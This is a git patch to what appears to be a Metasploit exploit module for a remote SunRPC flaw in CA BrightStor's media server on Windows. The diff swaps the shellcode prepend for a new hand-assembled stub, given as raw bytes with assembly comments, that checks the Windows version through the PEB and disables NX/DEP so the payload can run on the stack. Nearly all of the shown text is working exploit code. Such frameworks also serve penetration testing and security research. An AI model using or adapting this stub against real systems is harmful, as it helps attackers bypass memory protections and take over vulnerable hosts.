From 135e426d601a61661f2d6d1df86e537df0ecd444 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Fri, 4 May 2007 13:50:29 +0000 Subject: [PATCH] Updated prepend from topo git-svn-id: file:///home/svn/framework3/trunk@4864 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/brightstor/mediasrv_sunrpc.rb | 27 +++++++++++-------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 946c716e5e..142e37576c 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -32,17 +32,22 @@ class Exploits::Windows::Brightstor::MediasrvSunrpc < Msf::Exploit::Remote 'Prepend' => # Disable NX on 2k3 to upload data on the stack # (service crashes if the stack is switched to the heap) - "\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270 - "\x80\x39\x02" + # cmp byte ptr [ecx], 2 - "\x75\x15" + # jmp after - "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300 - "\xb8\xed\x00\x00\x00" + # mov eax, 0xed - "\x6a\x04" + # push 4 - "\x51" + # push ecx - "\x6a\x22" + # push 22 - "\x6a\xff" + # push -1 - "\x6a\xff" + # push -1 (padding) - "\xff\x12", # call dword ptr[edx] + "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB + "\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5 + "\x75\x30" + # jnz after + "\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2 + "\x75\x27" + # jnz after + "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0) + "\x76\x1b" + # jbe after + "\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8] + "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300 + "\xb8\xed\x00\x00\x00" + # mov eax, 0xed + "\x6a\x04" + # push 4 + "\x51" + # push ecx + "\x6a\x22" + # push 22 + "\x6a\xff" + # push -1 + "\x6a\xff" + # push -1 (padding) + "\xff\x12", # call dword ptr[edx] 'StackAdjustment' => -10000, },